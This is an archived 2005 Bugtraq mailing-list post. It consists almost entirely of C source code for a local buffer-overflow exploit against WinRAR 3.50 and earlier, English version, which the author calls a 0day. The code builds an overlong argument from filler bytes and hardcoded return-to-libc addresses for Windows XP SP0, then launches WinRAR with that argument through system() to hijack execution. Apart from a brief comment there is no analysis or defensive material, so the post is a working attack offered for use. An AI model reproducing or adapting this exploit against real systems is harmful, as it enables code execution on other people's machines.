lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 15 Oct 2005 21:30:56 -0000
From: edward11@...tmaster.co.uk
To: bugtraq@...urityfocus.com
Subject: winrar 3.50 Exploit


/*

local exploit for winrar <= 3.50 ENG version


bug is 0day :)

i'm used ret-2-func technique.

*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

int main ( int argc, char *argv[] )
{
   long sys_addr  = 0x77C18044; // winxp sp0 targets...
   long exit_addr = 0x77C27ADC;
   long cmd_addr  = 0x77C01335;

   char buf[3000];
   char cmd[3000];
   
   if ( argc < 2 )
   {
   printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version  *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
   exit(0);
   }

   memset(buf, 0x00, 3000);
   memset(cmd, 0x00, 3000);

   memset(buf, 0x55, 516);

   *(long*)&buf[strlen(buf)]  = sys_addr;
   *(long *)&buf[strlen(buf)] = exit_addr;
   *(long *)&buf[strlen(buf)] = cmd_addr;

   sprintf(cmd, "%s %s", argv[1], buf);
   system(cmd);

}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ